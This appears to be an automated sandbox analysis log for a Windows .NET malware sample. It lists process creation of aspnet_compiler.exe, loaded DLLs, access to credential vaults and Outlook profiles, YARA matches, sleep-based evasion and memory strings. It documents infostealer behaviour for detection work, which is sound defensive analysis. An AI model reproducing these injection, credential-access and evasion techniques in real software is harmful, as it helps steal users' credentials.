                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
                Source: C:\Users\user\Desktop\1e#U0414.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1e#U0414.exe.logJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\Desktop\1e#U0414.exeMutant created: NULL
                Source: 1e#U0414.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1e#U0414.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\1e#U0414.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 1e#U0414.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\1e#U0414.exe "C:\Users\user\Desktop\1e#U0414.exe"
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: 1e#U0414.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 1e#U0414.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: 1e#U0414.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: BATMAN.pdbxD source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: Sept24.pdbBSJB source: 1e#U0414.exe
                Source: Binary string: Sept24.pdb source: 1e#U0414.exe
                Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002754602.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
                Source: Binary string: BATMAN.pdb source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                Source: 1e#U0414.exeStatic PE information: section name: .text entropy: 7.531903789782718
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory allocated: 3400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6876Thread sleep time: -900000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6876Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                Source: C:\Users\user\Desktop\1e#U0414.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                Source: 1e#U0414.exe, 00000000.00000002.1750465955.00000000045E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                Source: 1e#U0414.exe, 00000000.00000002.1750465955.000000000462E000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.0000000004676000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                Source: 1e#U0414.exe, 00000000.00000002.1750465955.0000000004706000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.0000000004584000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.0000000004484000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.000000000452D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
